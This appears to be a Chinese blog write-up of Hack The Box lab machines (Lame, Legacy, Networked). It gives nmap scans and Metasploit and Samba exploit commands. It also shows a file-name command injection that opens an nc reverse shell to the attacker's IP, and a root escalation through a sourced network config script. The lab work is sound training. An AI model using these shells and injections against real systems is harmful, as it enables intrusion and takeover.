hackthebox环境配置及入门关卡writeup

买了个htb会员,做一些大致的攻略。
###环境配置
htb的服务器都比较远,网络很慢,所以我把vpn文件放到了vps上,通过vps进行扫描操作,速度会比较快。为了访问web页面,在vps上用ew开了个个socks5代理,本地用sstap挂这个代理,配置10.10.10.1/24段走代理,本地就可以全局访问htb靶场机器了,蚁剑什么的都可以用。
###lame
lame这关得到大家一致打的低难度分,确实也比较简单。IP为10.10.10.3。首先nmap扫一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
root@vultr:~/nmap/bin# nmap -sCV 10.10.10.3
Starting Nmap 7.80SVN ( https://nmap.org ) at 2020-01-10 03:49 UTC
Nmap scan report for 10.10.10.3
Host is up (0.086s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h30m00s, deviation: 3h32m09s, median: 0s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2020-01-09T22:49:31-05:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

这里看到开了ftp和samba。先上ftp看了下没有东西。搜了下ftp2.3.4和samba3.0.20都有rce漏洞。但ftp那个其实并不是所有该版本都存在,测试了一下在这台靶机并没有。所以试着利用smb的漏洞(总不能爆破ssh吧)
利用的是CVE2007-2447usermap_script这个洞。可以直接msf。默认反弹的是nc的shell很难用,可以升级成metrepreter

1
2
3
4
5
search samba
use exploit/multi/samba/usermap_script
exploit -z
search shell_to_meterpreter
use multi/manage/shell_to_meterpreter

这个方法需要msf,其实有简单的python利用脚本。在https://github.com/amriunix/CVE-2007-2447
直接python usermap_script.py 10.10.10.3 445 10.10.14.x 7788收shell就行了。一样升级shell

1
2
3
4
5
6
7
8
nc -lvp 7788
python -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo
fg
reset
export SHELL=bash
export TERM=xterm-256color

漏洞打完直接是root,cat两个文件就行了
###Legacy
这关是windows的smb,盲猜17010。
扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
nmap -script smb-vulns-* 10.10.10.4
smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

旧xp,显示08067和17010都有,开msf打吧。但是msf的17010好像打不了xp,所以用08067。很简单不细细写了。不行就重启靶机。

###networked
一样先扫一下,开了80,有个空白网站。扫一下目录发现backup目录,里面有备份源码的tar包。解压后大概看一下,有个上传功能。过滤了后缀并检测了mime。但这个服务器存在apache解析配置错误,就是httpd.conf里存在AddHandler php5-script .php这一行,会导致所有名字里有.php的文件都会按php解析。所以上传个test.php.gif内容为GIF8就可以。
之后在photos.php里面找到地址,蚁剑连上就有了第一个shell。这个shell用户是apache所以不能直接看user.txt。看到guly目录下还有个crontab

1
*/3 * * * * php /home/guly/check_attack.php

内容是每三分钟调用另一个check_attack.php。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
	$msg='';
  if ($value == 'index.html') {
	continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>

这个文件的功能是删除不符合命名格式的图片,本意是防止攻击。但是第二个exec里面很明显有个命令注入,构造一个恶意文件名来弹个shell。linux文件名可以有空格,所以在uploads目录下

1
touch 'xxx;nc -c bash 10.10.14.x 7788;.php'

创建一个恶意文件,等待crontab触发就接收到shell。
收到guly用户的shell后就可以cat user.txt了。之后提权root。先sudo -l看下发现(root) NOPASSWD: /usr/local/sbin/changename.sh,看一下这个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/bash -p
cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF
DEVICE=guly0
ONBOOT=no
NM_CONTROLLED=no
EoF

regexp="^[a-zA-Z0-9_\ /-]+$"

for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do
        echo "interface $var:"
        read x
        while [[ ! $x =~ $regexp ]]; do
                echo "wrong input, try again"
                echo "interface $var:"
                read x
        done
        echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly
done
  
/sbin/ifup guly0

就是把网卡配置输入写到ifcfg-guly这个文件中,然后ifup启动这个网卡。搜了下发现https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f这里提到了这个bug,当用户可以修改ifcfg文件时会导致代码执行。但官方认为这不是个bug,因为网卡本来就是只有root能操作的,只是算个配置问题。
其实这里就是把输入写进文件然后source了一下,但source就是有这个特性。先在本地试下:

1
2
echo some=asd id > example
source ./example

会发现id命令执行了。这个bug也是利用这个特性提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
[guly@networked ~]$ sudo /usr/local/sbin/changename.sh
interface NAME:
aaa id
interface PROXY_METHOD:
aaa whoami
interface BROWSER_ONLY:
aaa pwd
interface BOOTPROTO:
aaa date
uid=0(root) gid=0(root) groups=0(root)
root
/etc/sysconfig/network-scripts
Fri Jan 10 09:10:29 CET 2020
uid=0(root) gid=0(root) groups=0(root)
root
/etc/sysconfig/network-scripts
Fri Jan 10 09:10:29 CET 2020
ERROR     : [/etc/sysconfig/network-scripts/ifup-eth] Device guly0 does not seem to be present, delaying initialization.

可以看到whoami已经是root。这里比较奇怪的是每个命令都执行了两次,并且执行的路径在/etc/sysconfig/network-scripts,那么看下ifup的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/bin/bash
# Network Interface Configuration System
# Copyright (c) 1996-2009 Red Hat, Inc. all rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

unset WINDOW # defined by screen, conflicts with our usage

. /etc/init.d/functions

cd /etc/sysconfig/network-scripts
. ./network-functions

[ -f ../network ] && . ../network

CONFIG=${1}

[ -z "${CONFIG}" ] && {
    echo $"Usage: ifup <configuration>" >&2
    exit 1
}

need_config "${CONFIG}"

[ -f "${CONFIG}" ] || {
    echo $"$0: configuration for ${1} not found." >&2
    echo $"Usage: ifup <configuration>" >&2
    exit 1
}

if [ ${UID} != 0 ]; then
    if [ -x /usr/sbin/usernetctl ]; then
        source_config
        if /usr/sbin/usernetctl ${CONFIG} report ; then
            exec /usr/sbin/usernetctl ${CONFIG} up
        fi
    fi
    echo $"Users cannot control this device." >&2
    exit 1
fi

source_config
#后面不重要

可以看到最开始加载了/etc/sysconfig/network-scripts下的network-functions,并且代码里调用了两处source_config函数,那么看一下network-functions中的这个函数

1
2
3
4
5
6
7
source_config ()
{
    CONFIG=${CONFIG##*/}
    DEVNAME=${CONFIG##ifcfg-}
    . /etc/sysconfig/network-scripts/$CONFIG
    #后面不重要
}

这里就很简单了,source_config其实就是source了这个ifcfg-guly文件,导致了代码执行。ifup中调用了两次这个函数,所以上面的脚本命令执行了两次。

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

很惭愧<br><br>只做了一点微小的工作<br>谢谢大家